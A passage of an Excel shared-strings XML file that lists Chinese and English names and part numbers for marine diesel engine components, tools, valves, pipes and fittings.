        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接法兰</t>
    </r>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放管布置</t>
    </r>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器润滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀执行器润滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压油进口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低压液压油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统油反冲洗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制和安全空气管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布线和接头生产规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警仪器仪表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表盘式压力表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表盘式温度表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压力测量</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油中水传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴角度传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖保护罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空冷器箱体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器地板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口冲击扳手</t>
    </r>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体安装规范</t>
    </r>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座机加工</t>
    </r>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母上紧和拆卸说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油增压泵旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准和功能测试</t>
    </r>
  </si>
  <si>
    <r>
      <t>FIVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀首次生产认可</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动测试规范</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件基本版</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装及设置</t>
    </r>
  </si>
  <si>
    <r>
      <t>MC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机在船上的安装</t>
    </r>
  </si>
  <si>
    <r>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统部件串油</t>
    </r>
  </si>
  <si>
    <r>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器首次生产认可</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接头</t>
    </r>
  </si>
  <si>
    <r>
      <t>MTB21</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线图</t>
    </r>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <t>H</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带基座支柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧垫装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油切换程序</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制盖和插装阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气和空气系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞工具板工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器测试工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊运行设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器钩形扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蓄压器工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧装置液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀执行器液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底脚螺栓液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>乐泰胶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端部支撑螺栓液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖螺栓液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖吊链测试规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主管泄放</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座阀杆研磨机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀工作台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴润滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链驱动润滑油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀促动器进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀促动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀阀杆吊链测试规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀吊链测试规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导桶吊链测试规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆测量工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈焊接油嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座打磨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>驱动机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>振动控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最后一道主轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止回阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统</t>
    </r>
  </si>
  <si>
    <t>5197565-1.1</t>
  </si>
  <si>
    <t>FUEL VALVE WITHOUT SPINDL</t>
  </si>
  <si>
    <t>HEAD-FUELVALVE</t>
  </si>
  <si>
    <t>3163653-4.3</t>
  </si>
  <si>
    <t>5736476-4.0</t>
  </si>
  <si>
    <t>SPINDLE GUIDE WITH BLANK</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN227EK30040</t>
  </si>
  <si>
    <t>VALVE PANEL</t>
  </si>
  <si>
    <t>ARRANGEMENT OF HOLDING DOWN BOLT</t>
  </si>
  <si>
    <t>5K BLIND FLANGES</t>
  </si>
  <si>
    <t>GASKETS</t>
  </si>
  <si>
    <t>MAIN BEARING ASSEMBLY</t>
  </si>
  <si>
    <t>HEXAGON NUTS</t>
  </si>
  <si>
    <t>U NUT</t>
  </si>
  <si>
    <t>CRANK CASE DOOR</t>
  </si>
  <si>
    <t>TIE BOLT ASSEMBLY</t>
  </si>
  <si>
    <t>TIE BOLT</t>
  </si>
  <si>
    <t>CYLINDER JACKET ASSEMBLY</t>
  </si>
  <si>
    <t>STUD BOLTS</t>
  </si>
  <si>
    <t>O RING</t>
  </si>
  <si>
    <t>O RINGS</t>
  </si>
  <si>
    <t>INDICATOR VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>FUEL VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>GASKET  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>O RING  FOR EXHAUST VALVE</t>
  </si>
  <si>
    <t>STARTING AIR VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>PIN FOR CRANKCASE DOOR</t>
  </si>
  <si>
    <t>PIPE FLANGES</t>
  </si>
  <si>
    <t>5K WELDING PIPE FLANGES</t>
  </si>
  <si>
    <t>10K BLIND FLANGES</t>
  </si>
  <si>
    <t>SHIP'S STEEL PIPE U-BOLTS</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS (STRAIGHT THREADNIPPLE)</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS (SWIVEL ELBOW)</t>
  </si>
  <si>
    <t>CRANK SHAFT ASSEMBLY</t>
  </si>
  <si>
    <t>PISTON ASSEMBLY</t>
  </si>
  <si>
    <t>COVER  FOR GEAR CASE</t>
  </si>
  <si>
    <t>FO. PUMP DRIVING GEAR ASSEMBLY</t>
  </si>
  <si>
    <t>CROSS-RECESSED HEAD MACHINE SCREWS</t>
  </si>
  <si>
    <t>ROD END BEARINGS</t>
  </si>
  <si>
    <t>NAME PLATE FOR SPEED SETTING</t>
  </si>
  <si>
    <t>GREASE NIPPLE</t>
  </si>
  <si>
    <t>DUPLEX CHACK VALVE</t>
  </si>
  <si>
    <t>REPARE KIT FOR SHUTTLE VALVE</t>
  </si>
  <si>
    <t>CONTROL AIR VALVE</t>
  </si>
  <si>
    <t>4-WAY VALVE</t>
  </si>
  <si>
    <t>STARTING AIR CONTROL VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>KEY  FOR STARTING AIR CONTROL VALVE</t>
  </si>
  <si>
    <t>AUTOMATIC STARTING AIR STOP VALVE ASSEMBLY</t>
  </si>
  <si>
    <t>VALVE CAGE  FOR AUTOMATIC STOP VALVE</t>
  </si>
  <si>
    <t>PISTON  FOR AUTOMATIC STOP VALVE</t>
  </si>
  <si>
    <t>COVER  FOR AUTOMATIC STOP VALVE</t>
  </si>
  <si>
    <t>VALVE FOR AUTOMATIC STOP VALVE</t>
  </si>
  <si>
    <t>SPRING FOR STARTING AIR AUTOMATIC STOP VALVE</t>
  </si>
  <si>
    <t>PISTON RING  FOR AUTOMATIC STOP VALVE</t>
  </si>
  <si>
    <t>BUSH FOR AUTOMATIC STOP VALVE</t>
  </si>
  <si>
    <t>NIPPLES WITH TAPER THREAD</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS FOR COPPER TUBE</t>
  </si>
  <si>
    <t>BITE TYPE TUBE FITTINGS (TAPER THREAD NIPPLE)</t>
  </si>
  <si>
    <t>STARTING AIR NON-RETURN VALVE           ASSEMBLY</t>
  </si>
  <si>
    <t>HOUSING UNIT FOR STARTING AIR NON-RETURN VALVE</t>
  </si>
  <si>
    <t>PACKING FOR STARTING AIR NON-RETURN VALVE</t>
  </si>
  <si>
    <t>GASKET FOR STARTING AIR NON-RETURN VALVE</t>
  </si>
  <si>
    <t>HEXAGON SLOTTED AND CASTLE NUTS</t>
  </si>
  <si>
    <t>ASSY. GOVERNOR DRIVING GEAR</t>
  </si>
  <si>
    <t>REAMER BOLT</t>
  </si>
  <si>
    <t>GOVERNER  FOR GOVERNER DRIVING GEAR</t>
  </si>
  <si>
    <t>SPUR GEAR</t>
  </si>
  <si>
    <t>RUBBER RING FOR CYLINDER LO. DRIVING GEAR</t>
  </si>
  <si>
    <t>LIMIT SWITCH ROLLER LEVER TYPE</t>
  </si>
  <si>
    <t>PIPING CONECTION ARRANGEMENT</t>
  </si>
  <si>
    <t>NIPPLES WITH TEPERED THREAD</t>
  </si>
  <si>
    <t>OUTLET MAIN PIPE  FOR CYLINDER CW.</t>
  </si>
  <si>
    <t>CYLINDER CW. OUTLET BRANCH PIPE</t>
  </si>
  <si>
    <t>GLOBE VALVES</t>
  </si>
  <si>
